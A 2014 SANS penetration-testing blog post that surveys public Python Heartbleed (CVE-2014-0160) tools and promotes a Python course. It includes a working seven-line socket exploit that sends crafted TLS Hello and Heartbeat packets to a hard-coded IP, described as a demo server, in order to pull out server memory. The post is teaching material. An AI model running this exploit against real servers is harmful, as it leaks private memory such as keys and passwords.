SANS Penetration Testing

SANS Python Pen Testers | Exploit Heartbleed Vulnerabilities | SEC573

Pen Testers use Python to assess HeartBleed vulnerabilities.

By Mark Baggett

Unless you've been living in a cave without access to the outside world, you already know that OpenSSL 1.0.1 suffers from a serious vulnerability that allows a remote attacker to extract data from the memory of a target computer. The vulnerability was first made "public" (by varying definitions of the word "public") on April 7th. The events leading up to the disclosure are interesting. If you haven't reviewed them, the Sydney Morning Herald does a great job of outlining the events leading up to the disclosure. Check it out here:

http://www.smh.com.au/it-pro/security-it/heartbleed-disclosure-timeline-who-knew-what-and-when-20140415-zqurk.html

So while it is clear as mud who knew about the vulnerability and when, it is very clear what happened afterwards. A lot of people leveraged the power of Python to rapidly develop exploits that demonstrate the seriousness of the vulnerability.

The flaw was made public on April 7th. Shortly afterward, several tools were released. Jared Stafford (jspenguin) wrote the first public proof of concept Python tool to exploit the vulnerability. His tool called "SSLTEST.PY" was published here, http://s3.jspenguin.org/ssltest.py. As I write this, that website is unavailable but several copies of his original tool are still available through pastebin.com. http://pastebin.com/WmxzjkXJ

The exploit was quickly modified and improved by takeshix https://twitter.com/_takeshix. His version of the tool included support for several application layer protocols that use OpenSSL, such as secure email and SFTP. His update is called "HB-TEST.PY" This is probably the most widely used variant of the exploit and it is available here: https://gist.github.com/takeshixx/10107280#file-hb-test-py

Several other interesting Python penetration testing tools were also published in short order, including a scanner written by Rahul Sasi that looks for vulnerable servers called "HEARTBEAT_SCANNER.PY" His code is available here:

https://bitbucket.org/fb1h2s/cve-2014-0160/src/bba16b3eedef0e92bd91fea496b00c92eb515e29/Heartbeat_scanner.py?at=master

Peter Wu (aka Lekensteyn) also posted a tool called "PACEMAKER.PY" that can be used to test/exploit client software. That's right — client software! You have to worry about more than just those nasty web servers. His tool is available here.

https://github.com/Lekensteyn/pacemaker

In no time at all we went from a new vulnerability disclosure all the way up to a wealth of new tools that exploit the vulnerability. So what do "ssltest.PY", "hb-test.PY", "heartbeat_scanner.PY" and "pacemaker.PY" all have in common? They are all PYTHON PROGRAMS! Why? Because Python in pen testing is awesome! Python is a "rapid deployment", "batteries included" language. That means the core set of libraries include everything that you need to perform a wide variety of tasks, including developing exploits. Most tools only require a few lines of code. How simple is it to exploit this vulnerability with Python? You can do it in 7 lines of code. Check it out:

import socket
sh=socket.socket()
sh.connect(("54.217.122.251",443))
sh.send("16030200310100002d0302500bafbbb75ab83ef0ab9ae3f39c6315334137acfd6c181a2460dc4967c2fd960000040033c01101000000".decode('hex'))
helloresponse=sh.recv(8196)
sh.send("1803020003014000".decode('hex'))
data=sh.recv(8196)

The code is pretty straight-forward. First, we import the socket module and create a new socket object called "sh". We can use this object to connect to, and interact with, a remote server. Next we use the "sh" object to connect to a remote target by providing an IP address and a port. In this case, I am targeting a public server that has been set up by Martin Bachmann so you can see how this vulnerability works. The URL for his server is http://heartbleed.insign.ch. Then we send the SSL Hello message followed by the Heartbeat message. In this case, I am transmitting the Hello and Heartbeat packets generated by Rahul Sasi's scanner that trigger the exploit. Then we capture the response containing the remote machine memory into a variable called "data". That is it! You've exploited the vulnerability and captured the response.

Here are those 7 lines of code in action:

It is simple. Python empowers penetration testers. If you know how to use Python, you can go very quickly from a concept to working code. SANS Python for Penetration Testers course, SEC573, is designed to teach you what you need to develop these kinds of tools on your own. The course is self-paced with no prerequisites and will meet you where you are. Even if you don't have any programming background, the course will have you developing your own tools in to time! The first two days cover all of the essentials of the language. If you already know how to code, don't worry. You will NOT be bored. Since this course is self- paced, you will sharpen your existing skills as well as develop new ones, through a series of self-guided pyWars challenges. Then you will write four new penetration testing tools ready for use in your next engagement. Finally, you will put your new tools and skills to the test in a team based capture the flag event. Python is awesome and the SANS Python for pen testers course is the perfect place to learn new Python skills.

-Mark Baggett
@MarkBaggett

1 Comments

Posted April 24, 2014 at 6:48 AM | Permalink | Reply

diana

Thanks for sharing this knowledge since HB are bleed everywhere.

Post a Comment






Captcha


* Indicates a required field.